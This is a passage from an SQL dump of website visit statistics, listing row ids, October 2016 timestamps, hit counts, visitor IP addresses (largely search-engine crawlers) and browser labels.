163.172.64.184','other'),(68448,1476611245,1,0,1,0,'66.249.66.177',''),(68449,1476611427,1,0,1,0,'66.249.66.84',''),(68450,1476611990,2,2,0,0,'51.254.141.247','other'),(68451,1476612755,1,1,0,0,'164.132.161.52','other'),(68452,1476613001,1,1,0,0,'130.193.50.34','other'),(68453,1476613030,1,1,0,0,'66.102.9.27','other'),(68454,1476613252,1,1,0,0,'204.79.180.70','msie'),(68455,1476614348,1,0,1,0,'66.249.66.87',''),(68456,1476616623,1,1,0,0,'66.102.9.29','other'),(68457,1476617210,1,1,0,0,'130.193.50.34','other'),(68458,1476617867,1,1,0,0,'40.77.167.4','other'),(68459,1476619041,1,1,0,0,'213.5.193.150','other'),(68461,1476620144,1,1,0,0,'66.102.9.25','other'),(68462,1476620171,1,1,0,0,'40.77.167.6','other'),(68463,1476620173,1,0,1,0,'66.249.66.87',''),(68464,1476620546,1,0,1,0,'66.249.66.177',''),(68465,1476620735,1,1,0,0,'163.172.65.37','other'),(68466,1476620934,1,1,0,0,'164.132.161.62','other'),(68467,1476621081,2,0,2,0,'66.249.66.84',''),(68468,1476622183,1,1,0,0,'163.172.65.129','other'),(68469,1476622638,1,1,0,0,'163.172.64.253','other'),(68470,1476623575,1,1,0,0,'91.196.178.68','chrome'),(68471,1476623737,1,1,0,0,'66.102.9.29','other'),(68472,1476623893,1,1,0,0,'163.172.64.223','other'),(68473,1476624044,1,1,0,0,'164.132.161.88','other'),(68474,1476624118,1,1,0,0,'178.93.131.20','chrome'),(68475,1476624139,1,1,0,0,'163.172.66.75','other'),(68476,1476625291,1,1,0,0,'163.172.66.116','other'),(68477,1476625362,1,1,0,0,'94.179.123.7','firefox'),(68478,1476625617,1,1,0,0,'91.196.178.65','chrome'),(68479,1476626912,1,1,0,0,'163.172.65.46','other'),(68480,1476627333,1,1,0,0,'66.102.9.25','other'),(68482,1476627579,1,0,1,0,'66.249.66.87',''),(68483,1476627705,1,1,0,0,'163.172.66.6','other'),(68484,1476627836,1,1,0,0,'40.77.167.6','other'),(68485,1476628120,1,1,0,0,'163.172.66.72','other'),(68486,1476628224,1,1,0,0,'163.172.64.183','other'),(68487,1476629888,1,1,0,0,'163.172.64.229','other'),(68488,1476630085,1,1,0,0,'163.172.64.253','other'),(68489,1476630597,1,0,1,0,'66.249.66.183',''),(68490,1476630683,1,1,0,0,'51.255.65.18','other'),(68491,1476631036,1,1,0,0,'66.102.9.27','other'),(68492,1476631705,1,1,0,0,'163.172.65.116','other'),(68493,1476631934,1,0,1,0,'66.249.66.84',''),(68494,1476633039,1,1,0,0,'91.196.178.68','chrome'),(68495,1476633316,1,1,0,0,'164.132.161.76','other'),(68496,1476633618,1,0,1,0,'66.249.66.87',''),(68497,1476634046,1,0,1,0,'66.249.66.84',''),(68498,1476634083,1,1,0,0,'51.255.65.19','other'),(68499,1476634546,1,1,0,0,'40.77.167.6','other'),(68500,1476634564,1,1,0,0,'66.102.9.27','other'),(68501,1476634594,2,0,2,0,'66.249.66.87',''),(68502,1476635348,1,1,0,0,'130.193.50.34','other'),(68503,1476637118,1,1,0,0,'163.172.65.220','other'),(68504,1476637578,1,1,0,0,'163.172.66.93','other'),(68505,1476638132,1,1,0,0,'66.102.9.29','other'),(68506,1476638769,1,1,0,0,'163.172.66.81','other'),(68507,1476638801,1,1,0,0,'163.172.66.53','other'),(68508,1476639757,2,2,0,0,'47.198.179.214','other'),(68509,1476639969,1,0,1,0,'68.180.229.190',''),(68510,1476640053,1,1,0,0,'51.255.65.57','other'),(68511,1476640238,1,1,0,0,'51.255.65.78','other'),(68512,1476640306,1,1,0,0,'164.132.161.79','other'),(68513,1476640346,1,1,0,0,'163.172.66.6','other'),(68514,1476640482,1,0,1,0,'66.249.66.101',''),(68515,1476640930,1,1,0,0,'164.132.161.53','other'),(68516,1476641777,1,1,0,0,'66.102.9.20','other'),(68517,1476642919,1,0,1,0,'66.249.66.87',''),(68518,1476643579,1,1,0,0,'141.8.132.10','other'),(68519,1476644823,1,0,1,0,'66.249.66.168',''),(68520,1476644939,1,1,0,0,'51.255.65.39','other'),(68521,1476645091,1,1,0,0,'51.255.65.93','other'),(68522,1476645336,1,1,0,0,'66.102.9.25','other'),(68523,1476646942,1,1,0,0,'164.132.161.9','other'),(68524,1476648021,1,0,1,0,'66.249.66.81',''),(68525,1476648935,1,1,0,0,'66.102.9.27','chrome'),(68526,1476649048,1,1,0,0,'66.102.9.25','other'),(68527,1476649714,1,1,0,0,'51.255.65.30','other'),(68528,1476649860,1,1,0,0,'164.132.161.65','other'),(68529,1476650154,1,0,1,0,'66.249.64.27',''),(68530,1476650325,1,1,0,0,'51.255.65.20','other'),(68531,1476650485,1,1,0,0,'51.255.65.16','other'),(68532,1476650621,1,1,0,0,'163.172.65.20','other'),(68533,1476651106,1,1,0,0,'164.132.161.12','other'),(68534,1476651125,1,1,0,0,'164.132.161.87','other'),(68535,1476651766,1,0,1,0,'66.249.64.24',''),(68536,1476651868,1,0,1,0,'66.249.64.79',''),(68537,1476652167,1,0,1,0,'66.249.64.27',''),(68538,1476652260,1,1,0,0,'66.249.64.21','chrome'),(68539,1476652408,1,1,0,0,'66.249.64.24','chrome'),(68540,1476652717,1,1,0,0,'66.102.9.27','other'),(68541,1476653140,1,1,0,0,'164.132.161.44','other'),(68542,1476653627,1,1,0,0,'51.255.65.35','other'),(68543,1476653901,1,1,0,0,'157.55.39.116','other'),(68544,1476654229,1,0,1,0,'66.249.64.24',''),(68545,1476654335,1,1,0,0,'66.249.64.21','chrome'),(68546,1476656156,1,1,0,0,'66.102.9.29','other'),(68547,1476657492,1,1,0,0,'130.193.50.34','other'),(68548,1476657550,1,0,1,0,'66.249.64.21',''),(68549,1476657825,2,0,2,0,'66.249.64.27',''),(68550,1476659874,1,1,0,0,'66.102.9.27','other'),(68551,1476661222,1,1,0,0,'157.55.39.116','other'),(68552,1476661641,2,1,1,0,'66.249.64.27',''),(68553,1476663336,1,1,0,0,'66.102.9.29','other'),(68554,1476663880,5,5,0,0,'192.81.223.7','other'),(68555,1476664246,1,1,0,0,'82.207.113.219','chrome'),(68556,1476665694,1,1,0,0,'66.249.64.74','chrome'),(68557,1476665701,1,1,0,0,'66.249.64.21','chrome'),(68558,1476666430,1,1,0,0,'163.172.64.236','other'),(68559,1476666931,1,1,0,0,'66.102.9.25','other'),(68560,1476666959,1,1,0,0,'163.172.65.108','other'),(68561,1476667369,2,0,2,0,'66.249.64.27',''),(68562,1476667721,1,1,0,0,'141.8.183.25','other'),(68563,1476667836,1,0,1,0,'66.249.64.79',''),(68564,1476670719,1,1,0,0,'66.102.9.27','other'),(68565,1476670934,1,1,0,0,'130.193.50.34','other'),(68566,1476671789,1,1,0,0,'164.132.161.48','other'),(68567,1476672522,1,1,0,0,'164.132.161.90','other'),(68568,1476672721,1,0,1,0,'66.249.64.74',''),(68569,1476672738,1,1,0,0,'163.172.66.10','other'),(68570,1476672813,1,1,0,0,'51.255.65.85','other'),(68571,1476673760,1,1,0,0,'164.132.161.66','other'),(68572,1476673827,1,1,0,0,'163.172.66.125','other'),(68573,1476674237,1,1,0,0,'176.15.197.226','chrome'),(68574,1476674322,1,1,0,0,'66.102.9.29','other'),(68575,1476674474,1,1,0,0,'163.172.66.182','other'),(68576,1476674476,1,1,0,0,'164.132.161.40','other'),(68577,1476674821,1,0,1,0,'66.249.64.21',''),(68578,1476674959,1,1,0,0,'130.193.51.19','other'),(68579,1476677733,1,1,0,0,'66.102.9.27','other'),(68580,1476677961,1,1,0,0,'141.8.142.58','other'),(68581,1476678073,1,1,0,0,'180.76.15.23','other'),(68582,1476679177,1,1,0,0,'163.172.64.237','other'),(68583,1476679873,1,1,0,0,'164.132.161.51','other'),(68584,1476680062,1,1,0,0,'62.210.247.14','other'),(68585,1476681002,1,1,0,0,'93.158.152.84','other'),(68586,1476681226,1,0,1,0,'66.249.64.27',''),(68587,1476681340,1,1,0,0,'66.102.9.29','other'),(68588,1476681558,1,1,0,0,'163.172.66.99','other'),(68589,1476682262,1,1,0,0,'40.77.167.83','other'),(68590,1476683261,1,1,0,0,'66.249.64.24','chrome'),(68591,1476683462,1,1,0,0,'163.172.66.79','other'),(68592,1476683483,1,1,0,0,'163.172.66.74','other'),(68593,1476684062,1,1,0,0,'176.111.33.18','firefox'),(68594,1476684403,1,1,0,0,'93.158.152.40','other'),(68595,1476684926,1,1,0,0,'91.196.178.71','chrome'),(68596,1476685170,1,1,0,0,'66.102.9.29','chrome'),(68597,1476685375,1,1,0,0,'37.53.157.33','chrome'),(68598,1476685523,1,1,0,0,'163.172.66.170','other'),(68599,1476685594,1,0,1,0,'66.249.64.21',''),(68600,1476685685,1,1,0,0,'163.172.66.111','other'),(68601,1476686585,1,1,0,0,'93.158.152.51','other'),(68602,1476686633,1,1,0,0,'178.154.189.37','other'),(68603,1476686634,1,1,0,0,'94.179.75.178','chrome'),(68604,1476686697,1,1,0,0,'163.172.66.66','other'),(68605,1476686754,1,1,0,0,'164.132.161.56','other'),(68606,1476686932,1,1,0,0,'163.172.65.37','other'),(68607,1476688513,1,1,0,0,'91.192.132.242','firefox'),(68608,1476688525,1,1,0,0,'141.8.142.58','other'),(68609,1476688529,1,1,0,0,'141.8.142.67','other'),(68610,1476688655,1,1,0,0,'82.207.91.234','firefox'),(68611,1476688825,1,1,0,0,'62.216.43.242','chrome'),(68612,1476688909,2,0,2,0,'66.249.64.27',''),(68613,1476689069,1,1,0,0,'37.53.15.123','chrome'),(68614,1476690231,1,1,0,0,'130.193.50.34','other'),(68615,1476690296,1,0,1,0,'66.249.64.74',''),(68616,1476690423,1,0,1,0,'66.249.64.79',''),(68617,1476690514,1,1,0,0,'130.193.51.19','other'),(68618,1476691106,1,1,0,0,'178.94.208.116','chrome'),(68619,1476691117,1,1,0,0,'91.196.178.65','firefox'),(68620,1476692069,1,1,0,0,'37.52.131.193','firefox'),(68621,1476692176,1,1,0,0,'66.102.9.29','other'),(68622,1476692265,1,1,0,0,'164.132.161.8','other'),(68623,1476692358,1,1,0,0,'163.172.65.197','other'),(68624,1476692567,1,1,0,0,'40.77.167.6','other'),(68625,1476692648,1,1,0,0,'163.172.66.147','other'),(68626,1476693026,1,1,0,0,'141.8.183.25','other'),(68627,1476693093,1,1,0,0,'31.42.178.42','chrome'),(68628,1476693243,1,1,0,0,'163.172.66.144','other'),(68629,1476693352,1,1,0,0,'91.196.178.70','chrome'),(68630,1476693527,1,1,0,0,'91.196.178.135','firefox'),(68631,1476693559,1,0,1,0,'66.249.64.21',''),(68632,1476693887,1,1,0,0,'164.132.161.46','other'),(68633,1476693905,1,0,1,0,'66.249.64.24',''),(68634,1476694225,1,1,0,0,'163.172.65.249','other'),(68635,1476694345,1,1,0,0,'163.172.64.235','other'),(68636,1476695422,1,1,0,0,'164.132.161.54','other'),(68637,1476695736,1,1,0,0,'66.102.9.27','other'),(68638,1476695795,1,0,1,0,'66.249.64.27',''),(68639,1476696006,1,1,0,0,'195.64.136.162','chrome'),(68640,1476696040,1,1,0,0,'130.193.51.19','other'),(68641,1476696140,1,1,0,0,'51.255.65.54','other'),(68642,1476696649,1,1,0,0,'91.196.178.164','chrome'),(68643,1476696720,1,1,0,0,'130.180.212.237','firefox'),(68644,1476696740,1,1,0,0,'130.193.50.34','other'),(68645,1476696757,2,2,0,0,'91.124.180.11','chrome'),(68646,1476697031,1,1,0,0,'91.196.178.169','msie'),(68647,1476698547,1,1,0,0,'91.196.177.15','chrome'),(68648,1476698625,1,1,0,0,'46.185.3.105','chrome'),(68649,1476698684,1,1,0,0,'51.255.65.88','other'),(68650,1476699090,1,1,0,0,'78.111.185.158','chrome'),(68651,1476699372,1,1,0,0,'66.102.9.25','other'),(68652,1476699386,1,1,0,0,'163.172.64.254','other'),(68653,1476699437,1,1,0,0,'141.8.142.67','other'),(68654,1476700055,1,0,1,0,'66.249.64.21',''),(68655,1476700225,1,1,0,0,'92.112.216.133','firefox'),(68656,1476700322,1,1,0,0,'180.76.15.23','other'),(68657,1476700478,1,1,0,0,'163.172.66.29','other'),(68658,1476701595,1,1,0,0,'180.76.15.139','other'),(68659,1476701731,1,0,1,0,'66.249.64.24',''),(68660,1476702129,1,1,0,0,'141.8.183.25','other'),(68661,1476702228,2,2,0,0,'91.196.178.71','firefox'),(68662,1476702379,1,1,0,0,'51.255.65.21','other'),(68663,1476702399,1,1,0,0,'163.172.65.50','other'),(68664,1476702520,1,1,0,0,'51.255.65.32','other'),(68665,1476702618,1,0,1,0,'66.249.64.27',''),(68666,1476702980,1,1,0,0,'66.102.9.27','other'),(68667,1476703016,3,0,3,0,'66.249.64.21',''),(68668,1476703257,1,1,0,0,'51.255.65.67','other'),(68669,1476703393,1,1,0,0,'163.172.66.97','other'),(68670,1476703547,1,0,1,0,'66.249.64.24',''),(68671,1476703638,1,1,0,0,'163.172.66.162','other'),(68672,1476703696,1,0,1,0,'66.249.64.27',''),(68673,1476704228,1,0,1,0,'66.249.64.69',''),(68674,1476704575,1,1,0,0,'163.172.66.122','other'),(68675,1476704589,1,1,0,0,'164.132.161.5','other'),(68676,1476704716,1,1,0,0,'163.172.64.184','other'),(68677,1476705461,1,1,0,0,'141.8.183.19','other'),(68678,1476705709,1,1,0,0,'164.132.161.6','other'),(68679,1476705764,1,1,0,0,'163.172.66.150','other'),(68680,1476706133,1,1,0,0,'163.172.66.175','other'),(68681,1476706263,1,1,0,0,'164.132.161.92','other'),(68682,1476706559,1,1,0,0,'66.102.9.27','other'),(68683,1476706989,1,1,0,0,'31.43.19.43','chrome'),(68684,1476707221,1,1,0,0,'163.172.65.64','other'),(68685,1476707410,1,1,0,0,'163.172.66.66','other'),(68686,1476707521,1,1,0,0,'163.172.66.14','other'),(68687,1476708158,1,1,0,0,'51.255.65.32','other'),(68688,1476708316,1,1,0,0,'91.196.178.68','firefox'),(68689,1476708437,1,1,0,0,'91.196.178.71','chrome'),(68690,1476708527,1,1,0,0,'163.172.66.110','other'),(68691,1476708637,1,1,0,0,'185.26.182.35','opera'),(68692,1476708681,1,1,0,0,'93.158.152.40','other'),(68693,1476709517,1,1,0,0,'163.172.64.216','other'),(68694,1476709911,1,1,0,0,'91.196.178.38','firefox'),(68695,1476710021,1,1,0,0,'94.179.30.94','firefox'),(68696,1476710193,1,1,0,0,'66.102.9.27','other'),(68697,1476710262,1,1,0,0,'95.132.31.182','firefox'),(68698,1476710300,1,1,0,0,'176.102.195.10','chrome'),(68699,1476710603,1,0,1,0,'66.249.64.27',''),(68700,1476710844,1,1,0,0,'94.179.102.208','chrome'),(68701,1476710850,1,1,0,0,'180.76.15.26','other'),(68702,1476711093,1,0,1,0,'66.249.64.69',''),(68703,1476711098,1,0,1,0,'66.249.64.21',''),(68704,1476711417,1,1,0,0,'62.65.229.246','firefox'),(68705,1476711541,1,1,0,0,'91.201.180.84','opera'),(68706,1476711666,1,1,0,0,'164.132.161.46','other'),(68707,1476711747,1,1,0,0,'91.196.178.65','firefox'),(68708,1476711916,1,1,0,0,'91.196.178.70','chrome'),(68709,1476711953,1,1,0,0,'40.77.167.30','other'),(68710,1476712186,1,1,0,0,'51.255.65.55','other'),(68711,1476712663,2,2,0,0,'91.196.178.71','firefox'),(68712,1476712754,1,1,0,0,'195.230.152.150','other'),(68713,1476712831,1,1,0,0,'51.255.65.10','other'),(68714,1476712852,1,1,0,0,'163.172.66.36','other'),(68715,1476713295,1,1,0,0,'168.235.197.128','other'),(68716,1476713816,1,1,0,0,'66.102.9.27','other'),(68717,1476714258,1,1,0,0,'163.172.65.185','other'),(68718,1476715574,1,1,0,0,'66.249.93.15','chrome'),(68719,1476716289,1,1,0,0,'141.8.132.30','other'),(68720,1476716694,1,0,1,0,'66.249.64.21',''),(68721,1476716696,1,1,0,0,'130.193.50.6','other'),(68722,1476716700,1,1,0,0,'141.8.183.14','other'),(68723,1476717155,1,1,0,0,'93.143.188.5','firefox'),(68724,1476717224,1,0,1,0,'66.249.64.24',''),(68725,1476717393,1,1,0,0,'66.102.9.27','other'),(68726,1476717539,1,1,0,0,'163.172.65.246','other'),(68727,1476717675,2,0,2,0,'66.249.64.21',''),(68728,1476718062,1,1,0,0,'163.172.65.32','other'),(68729,1476718636,1,0,1,0,'66.249.64.24',''),(68730,1476718999,1,0,1,0,'66.249.64.74',''),(68731,1476719007,1,0,1,0,'66.249.64.69',''),(68732,1476719036,1,1,0,0,'164.132.161.54','other'),(68733,1476719830,1,1,0,0,'51.255.65.40','other'),(68734,1476720561,1,1,0,0,'130.193.51.14','other'),(68735,1476720758,1,1,0,0,'163.172.66.29','other'),(68736,1476720973,1,1,0,0,'66.102.9.25','other'),(68737,1476721297,1,1,0,0,'93.143.188.5','firefox'),(68738,1476721373,1,1,0,0,'163.172.66.125','other'),(68739,1476721616,1,1,0,0,'94.178.147.18','firefox'),(68740,1476721698,1,1,0,0,'217.69.133.232','other'),(68741,1476722020,1,0,1,0,'66.249.64.79',''),(68742,1476722755,1,1,0,0,'130.193.50.34','other'),(68743,1476722763,1,1,0,0,'91.196.178.100','chrome'),(68744,1476722935,1,1,0,0,'178.92.249.64','chrome'),(68745,1476723540,1,1,0,0,'109.122.59.96','chrome'),(68746,1476724175,1,1,0,0,'40.77.167.6','other'),(68747,1476724233,1,0,1,0,'66.249.64.21',''),(68748,1476724337,2,0,2,0,'66.249.64.27',''),(68749,1476724597,1,1,0,0,'66.102.9.27','other'),(68750,1476725230,1,1,0,0,'62.221.75.114','chrome'),(68751,1476725428,1,1,0,0,'82.145.223.59','other'),(68752,1476726219,1,1,0,0,'130.193.50.34','other'),(68753,1476727087,1,1,0,0,'141.8.183.25','other'),(68754,1476727159,1,1,0,0,'94.179.19.8','chrome'),(68755,1476727424,2,0,2,0,'66.249.64.24',''),(68756,1476728140,1,1,0,0,'66.102.9.25','other'),(68757,1476728539,1,1,0,0,'40.77.167.4','other'),(68758,1476729236,1,1,0,0,'66.249.64.21','chrome'),(68759,1476729246,1,1,0,0,'141.8.183.25','other'),(68760,1476729380,1,0,1,0,'66.249.64.69',''),(68761,1476729585,1,1,0,0,'164.132.161.10','other'),(68762,1476730392,1,1,0,0,'163.172.66.76','other'),(68763,1476730736,1,0,1,0,'66.249.64.24',''),(68764,1476731149,1,0,1,0,'66.249.64.27',''),(68765,1476731435,1,1,0,0,'163.172.66.81','other'),(68766,1476731547,3,0,3,0,'66.249.64.21',''),(68767,1476731729,1,1,0,0,'195.184.218.135','chrome'),(68768,1476731737,1,1,0,0,'66.102.9.29','other'),(68769,1476731871,1,1,0,0,'130.193.51.19','other'),(68770,1476732133,1,1,0,0,'141.8.142.10','other'),(68771,1476732158,1,1,0,0,'163.172.66.73','other'),(68772,1476732842,1,1,0,0,'163.172.66.83','other'),(68773,1476732851,1,1,0,0,'163.172.65.110','other'),(68774,1476732858,2,0,2,0,'68.180.229.27',''),(68775,1476733262,1,1,0,0,'37.115.113.62','chrome'),(68776,1476733909,1,1,0,0,'163.172.64.186','other'),(68777,1476734203,1,1,0,0,'164.132.161.35','other'),(68778,1476734850,1,1,0,0,'51.255.65.2','other'),(68779,1476734866,1,1,0,0,'195.184.218.135','other'),(68780,1476734875,1,1,0,0,'163.172.66.139','other'),(68781,1476735363,1,1,0,0,'141.8.132.76','other'),(68782,1476735383,1,1,0,0,'163.172.64.185','other'),(68783,1476735392,1,1,0,0,'66.102.9.27','other'),(68784,1476736300,1,1,0,0,'163.172.66.127','other'),(68785,1476737101,1,1,0,0,'164.132.161.82','other'),(68786,1476737978,1,0,1,0,'66.249.64.21',''),(68787,1476738573,1,1,0,0,'195.184.218.135','other'),(68788,1476738697,1,1,0,0,'40.77.167.30','other'),(68789,1476738733,1,1,0,0,'141.8.183.25','other'),(68790,1476738892,1,0,1,0,'66.249.64.27',''),(68791,1476738936,1,1,0,0,'66.102.9.29','other'),(68792,1476738990,1,1,0,0,'66.249.64.27','chrome'),(68793,1476739745,1,1,0,0,'163.172.64.199','other'),(68794,1476741002,1,1,0,0,'163.172.65.220','other'),(68795,1476741351,1,1,0,0,'51.255.65.71','other'),(68796,1476741452,1,1,0,0,'163.172.66.172','other'),(68797,1476741926,1,1,0,0,'195.184.218.135','other'),(68798,1476742110,1,1,0,0,'93.158.152.84','other'),(68799,1476742554,1,1,0,0,'66.102.9.29','other'),(68800,1476742779,1,0,1,0,'66.249.64.27',''),(68801,1476744776,2,0,2,0,'66.249.64.24',''),(68802,1476745315,1,1,0,0,'93.158.152.40','other'),(68803,1476745448,1,1,0,0,'40.77.167.6','other'),(68804,1476745664,1,1,0,0,'40.77.167.83','other'),(68805,1476746173,1,1,0,0,'66.102.9.29','other'),(68806,1476747434,1,0,1,0,'66.249.64.27',''),(68807,1476747513,1,1,0,0,'66.249.64.27','chrome'),(68808,1476747549,1,1,0,0,'66.249.64.69','chrome'),(68809,1476748791,1,0,1,0,'66.249.64.21',''),(68810,1476749176,1,0,1,0,'66.249.64.27',''),(68811,1476749776,1,1,0,0,'66.102.9.25','other'),(68812,1476749821,1,0,1,0,'66.249.64.74',''),(68813,1476750179,4,4,0,0,'66.249.83.75','chrome'),(68814,1476750294,1,1,0,0,'109.63.135.223','other'),(68815,1476751638,1,0,1,0,'66.249.64.27',''),(68816,1476753546,1,1,0,0,'66.102.9.27','other'),(68817,1476754199,1,0,1,0,'68.180.229.27',''),(68818,1476754655,1,1,0,0,'66.249.64.21','chrome'),(68819,1476754800,1,1,0,0,'66.249.64.27','chrome'),(68820,1476755024,1,0,1,0,'66.249.64.69',''),(68821,1476756936,1,1,0,0,'66.102.9.27','other'),(68822,1476757207,1,1,0,0,'93.158.152.61','other'),(68823,1476757384,1,0,1,0,'66.249.64.27',''),(68824,1476759995,1,0,1,0,'66.249.64.24',''),(68825,1476760082,1,1,0,0,'178.255.215.94','other'),(68826,1476760810,1,1,0,0,'66.102.9.27','other'),(68827,1476761309,1,1,0,0,'40.77.167.6','other'),(68828,1476761515,1,0,1,0,'66.249.64.21',''),(68829,1476761531,1,0,1,0,'66.249.64.27',''),(68830,1476761557,1,0,1,0,'66.249.64.24',''),(68831,1476763233,1,0,1,0,'66.249.64.27',''),(68832,1476764141,1,1,0,0,'66.102.9.27','other'),(68833,1476764253,1,1,0,0,'180.76.15.155','other'),(68834,1476764677,1,1,0,0,'62.221.75.114','chrome'),(68835,1476765865,1,0,1,0,'66.249.64.61',''),(68836,1476766769,1,1,0,0,'66.102.9.27','other'),(68837,1476767180,1,0,1,0,'66.249.64.21',''),(68838,1476768685,1,0,1,0,'66.249.64.21',''),(68839,1476768895,1,1,0,0,'94.179.11.200','chrome'),(68840,1476769177,1,0,1,0,'66.249.64.24',''),(68841,1476769475,1,1,0,0,'176.241.109.84','firefox'),(68842,1476770154,1,0,1,0,'66.249.64.21',''),(68843,1476771564,1,0,1,0,'66.249.64.27',''),(68844,1476771699,1,1,0,0,'66.102.9.25','other'),(68845,1476772213,1,1,0,0,'91.196.178.132','firefox'),(68846,1476773923,1,0,1,0,'66.249.64.24',''),(68847,1476774310,1,1,0,0,'91.196.178.72','chrome'),(68848,1476775328,1,1,0,0,'66.102.9.27','other'),(68849,1476775442,1,1,0,0,'107.21.1.8','other'),(68850,1476776681,1,1,0,0,'69.30.221.242','other'),(68851,1476776688,1,1,0,0,'178.137.206.60','chrome'),(68852,1476777295,1,0,1,0,'68.180.229.27',''),(68853,1476777509,1,0,1,0,'66.249.64.79',''),(68854,1476777787,1,0,1,0,'66.249.64.27',''),(68855,1476777917,1,1,0,0,'195.225.147.134','opera'),(68856,1476778538,1,1,0,0,'66.102.9.27','other'),(68857,1476778566,1,1,0,0,'95.221.217.211','msie'),(68858,1476778821,1,1,0,0,'93.73.234.193','firefox'),(68859,1476779184,1,1,0,0,'94.179.8.156','chrome'),(68860,1476780909,1,1,0,0,'207.46.13.123','other'),(68861,1476781749,1,1,0,0,'92.112.249.81','chrome'),(68862,1476782178,1,1,0,0,'93.171.245.192','chrome'),(68863,1476782275,1,1,0,0,'141.8.183.25','other'),(68864,1476782628,1,1,0,0,'66.102.9.27','other'),(68865,1476783058,1,0,1,0,'66.249.64.21',''),(68866,1476783361,4,4,0,0,'91.196.178.65','firefox'),(68867,1476783462,1,1,0,0,'37.52.18.19','chrome'),(68868,1476783616,1,1,0,0,'128.72.80.71','other'),(68869,1476784182,1,1,0,0,'180.76.15.137','other'),(68870,1476784369,1,1,0,0,'37.53.224.78','chrome'),(68871,1476784551,2,2,0,0,'94.179.14.142','firefox'),(68872,1476785226,1,1,0,0,'66.102.9.27','chrome'),(68873,1476785495,1,1,0,0,'91.196.178.65','firefox'),(68874,1476785811,2,0,2,0,'66.249.64.21',''),(68875,1476786062,1,0,1,0,'66.249.64.24',''),(68876,1476786107,1,1,0,0,'66.102.9.27','other'),(68877,1476786169,2,0,2,0,'66.249.64.27',''),(68878,1476786717,1,1,0,0,'91.196.178.71','chrome'),(68879,1476787754,1,0,1,0,'66.249.64.24',''),(68880,1476788935,1,1,0,0,'176.102.195.10','chrome'),(68881,1476789708,1,1,0,0,'66.102.9.27','other'),(68882,1476790353,1,1,0,0,'91.196.178.68','firefox'),(68883,1476790409,1,1,0,0,'94.178.138.173','firefox'),(68884,1476790742,1,0,1,0,'66.249.64.24',''),(68885,1476792307,1,0,1,0,'66.249.64.74',''),(68886,1476792847,1,1,0,0,'91.192.132.242','firefox'),(68887,1476793286,1,1,0,0,'91.196.178.65','firefox'),(68888,1476793376,1,1,0,0,'66.102.9.29','other'),(68889,1476794200,1,0,1,0,'66.249.64.24',''),(68890,1476794710,2,2,0,0,'91.196.178.65','firefox'),(68891,1476795560,1,1,0,0,'164.132.161.14','other'),(68892,1476795791,1,0,1,0,'66.249.64.21',''),(68893,1476796025,1,1,0,0,'163.172.66.168','other'),(68894,1476796318,1,1,0,0,'91.196.178.165','chrome'),(68895,1476796450,1,1,0,0,'91.196.178.65','firefox'),(68896,1476796666,1,1,0,0,'66.249.64.24','chrome'),(68897,1476796897,1,1,0,0,'66.102.9.27','other'),(68898,1476796959,1,1,0,0,'163.172.66.41','other'),(68899,1476797146,1,1,0,0,'94.179.99.233','firefox'),(68900,1476797157,1,1,0,0,'37.52.129.207','chrome'),(68901,1476797160,1,1,0,0,'163.172.64.228','other'),(68902,1476797476,1,1,0,0,'51.255.65.8','other'),(68903,1476797513,1,1,0,0,'130.193.50.34','other'),(68904,1476798870,1,1,0,0,'91.196.178.70','firefox'),(68905,1476799073,1,1,0,0,'91.196.178.65','firefox'),(68906,1476800031,1,1,0,0,'164.132.161.49','other'),(68907,1476800297,1,1,0,0,'163.172.65.181','other'),(68908,1476800395,1,1,0,0,'91.196.178.70','other'),(68909,1476800416,1,1,0,0,'51.255.65.30','other'),(68910,1476800624,1,1,0,0,'40.77.167.53','other'),(68911,1476800932,1,1,0,0,'163.172.64.232','other'),(68912,1476801854,1,1,0,0,'164.132.161.77','other'),(68913,1476802120,1,1,0,0,'163.172.66.39','other'),(68914,1476802280,1,1,0,0,'51.255.65.77','other'),(68915,1476802587,1,1,0,0,'141.8.142.67','other'),(68916,1476802588,1,1,0,0,'141.8.142.61','other'),(68917,1476802605,1,0,1,0,'66.249.64.24',''),(68918,1476802741,1,1,0,0,'163.172.66.26','other'),(68919,1476802756,1,1,0,0,'51.255.65.26','other'),(68920,1476802944,1,1,0,0,'163.172.66.105','other'),(68921,1476804119,1,1,0,0,'66.102.9.29','other'),(68922,1476804190,1,1,0,0,'66.249.64.27','chrome'),(68923,1476804390,1,1,0,0,'51.255.65.94','other'),(68924,1476804811,1,1,0,0,'181.95.164.234','firefox'),(68925,1476805010,1,1,0,0,'51.255.65.50','other'),(68926,1476805071,1,0,1,0,'66.249.64.21',''),(68927,1476805688,1,1,0,0,'163.172.66.111','other'),(68928,1476805725,1,1,0,0,'164.132.161.92','other'),(68929,1476805871,1,1,0,0,'51.255.65.23','other'),(68930,1476806789,1,1,0,0,'93.183.193.110','chrome'),(68931,1476806864,1,1,0,0,'163.172.65.54','other'),(68932,1476807004,1,1,0,0,'163.172.66.21','other'),(68933,1476807082,3,3,0,0,'130.193.50.34','other'),(68934,1476807410,1,1,0,0,'51.255.65.44','other'),(68935,1476807450,1,1,0,0,'130.193.51.19','other'),(68936,1476807750,1,1,0,0,'66.102.9.25','other'),(68937,1476808687,1,0,1,0,'66.249.64.24',''),(68938,1476809725,1,1,0,0,'163.172.64.231','other'),(68939,1476809896,1,1,0,0,'51.255.65.72','other'),(68940,1476810166,1,1,0,0,'78.111.187.185','firefox'),(68941,1476810203,1,1,0,0,'130.193.50.34','other'),(68942,1476810969,1,1,0,0,'51.255.65.36','other'),(68943,1476811105,1,1,0,0,'163.172.65.214','other'),(68944,1476811157,1,1,0,0,'51.255.65.19','other'),(68945,1476811307,1,1,0,0,'66.102.9.27','other'),(68946,1476811584,1,1,0,0,'164.132.161.70','other'),(68947,1476811634,1,1,0,0,'163.172.64.192','other'),(68948,1476812116,1,1,0,0,'130.193.50.34','other'),(68949,1476812749,2,0,2,0,'66.249.64.27',''),(68950,1476813064,1,0,1,0,'66.249.64.21',''),(68951,1476813135,1,1,0,0,'163.172.65.185','other'),(68952,1476813327,1,1,0,0,'51.255.65.94','other'),(68953,1476813355,1,0,1,0,'66.249.64.79',''),(68954,1476813373,1,1,0,0,'94.179.22.199','chrome'),(68955,1476814187,1,1,0,0,'94.179.71.27','firefox'),(68956,1476814274,1,1,0,0,'164.132.161.26','other'),(68957,1476814707,1,1,0,0,'163.172.65.62','other'),(68958,1476814935,1,1,0,0,'130.193.50.34','other'),(68959,1476814944,1,1,0,0,'66.102.9.29','other'),(68960,1476815152,1,1,0,0,'164.132.161.68','other'),(68961,1476816179,2,2,0,0,'130.193.50.34','other'),(68962,1476816351,1,1,0,0,'163.172.65.228','other'),(6